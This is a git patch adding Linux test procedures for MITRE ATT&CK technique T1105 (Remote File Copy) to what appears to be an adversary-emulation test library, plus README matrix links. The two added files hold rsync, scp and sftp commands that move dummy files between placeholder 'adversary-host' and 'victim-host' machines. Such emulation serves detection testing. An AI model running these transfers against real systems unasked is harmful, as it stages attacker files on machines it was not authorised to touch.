From 4f65330559191eabb27017f6f9dfaa83e37ef4a8 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 9 Mar 2018 21:54:34 -0600 Subject: [PATCH] Added Remote File Copy tests on Linux and relevant README --- Linux/Command_and_Control/Remote_File_Copy.md | 35 +++++++++++++++++++ Linux/Lateral_Movement/Remote_File_Copy.md | 35 +++++++++++++++++++ Linux/README.md | 4 +-- 3 files changed, 72 insertions(+), 2 deletions(-) create mode 100644 Linux/Command_and_Control/Remote_File_Copy.md create mode 100644 Linux/Lateral_Movement/Remote_File_Copy.md diff --git a/Linux/Command_and_Control/Remote_File_Copy.md b/Linux/Command_and_Control/Remote_File_Copy.md new file mode 100644 index 00000000..288f77db --- /dev/null +++ b/Linux/Command_and_Control/Remote_File_Copy.md @@ -0,0 +1,35 @@ +# Remote File Copy + +MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105) + +## Adversary System Configuration +### Ensure SSH access has been configured for an adversary account + echo "This file transferred by scp" > /tmp/adversary-scp + echo "This file transferred by sftp" > /tmp/adversary-sftp + mkdir /tmp/adversary-rsync + cd /tmp/adversary-rsync + touch a b c d e f g + +## Victim System Configuration +### Ensure SSH access has been configured for a victim account +### Ensure write access for victim account to this directory + mkdir /tmp/victim-files + cd /tmp/victim-files + +## Push files to victim using rsync + rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ + +## Pull files from adversary using rsync + rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ + +## Push files to victim using scp + scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ + +## Pull file from adversary using scp + scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file + +## Push files to victim using sftp + sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' + +## Pull file from adversary using sftp + sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file diff --git a/Linux/Lateral_Movement/Remote_File_Copy.md b/Linux/Lateral_Movement/Remote_File_Copy.md new file mode 100644 index 00000000..288f77db --- /dev/null +++ b/Linux/Lateral_Movement/Remote_File_Copy.md @@ -0,0 +1,35 @@ +# Remote File Copy + +MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105) + +## Adversary System Configuration +### Ensure SSH access has been configured for an adversary account + echo "This file transferred by scp" > /tmp/adversary-scp + echo "This file transferred by sftp" > /tmp/adversary-sftp + mkdir /tmp/adversary-rsync + cd /tmp/adversary-rsync + touch a b c d e f g + +## Victim System Configuration +### Ensure SSH access has been configured for a victim account +### Ensure write access for victim account to this directory + mkdir /tmp/victim-files + cd /tmp/victim-files + +## Push files to victim using rsync + rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ + +## Pull files from adversary using rsync + rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ + +## Push files to victim using scp + scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ + +## Pull file from adversary using scp + scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file + +## Push files to victim using sftp + sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' + +## Pull file from adversary using sftp + sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file diff --git a/Linux/README.md b/Linux/README.md index 7d239d78..d22a7473 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -4,7 +4,7 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Remote File Copy](Lateral_Movement/Remote_File_Copy.md) | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | | [Hidden Files and Directories](Persistence/Hidden_Files_and_Directories.md) | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | | Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | @@ -14,7 +14,7 @@ | Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication | | | | Masquerading | | | | | | | Multilayer Encryption | | | | Redundant Access | -| | | [Rootkits](Defense_Evasion/Rootkits.md) | | | | | | | Remote File Copy | +| | | [Rootkits](Defense_Evasion/Rootkits.md) | | | | | | | [Remote File Copy](Command_and_Control/Remote_File_Copy.md) | | | | Scripting | | | | | | | Standard Application Layer Protocol | | | | Space after Filename | | | | | | | Standard Cryptographic Protocol | | | | [Timestomp](Defense_Evasion/Timestomp.md) | | | | | | | Standard Non-Application Layer Protocol |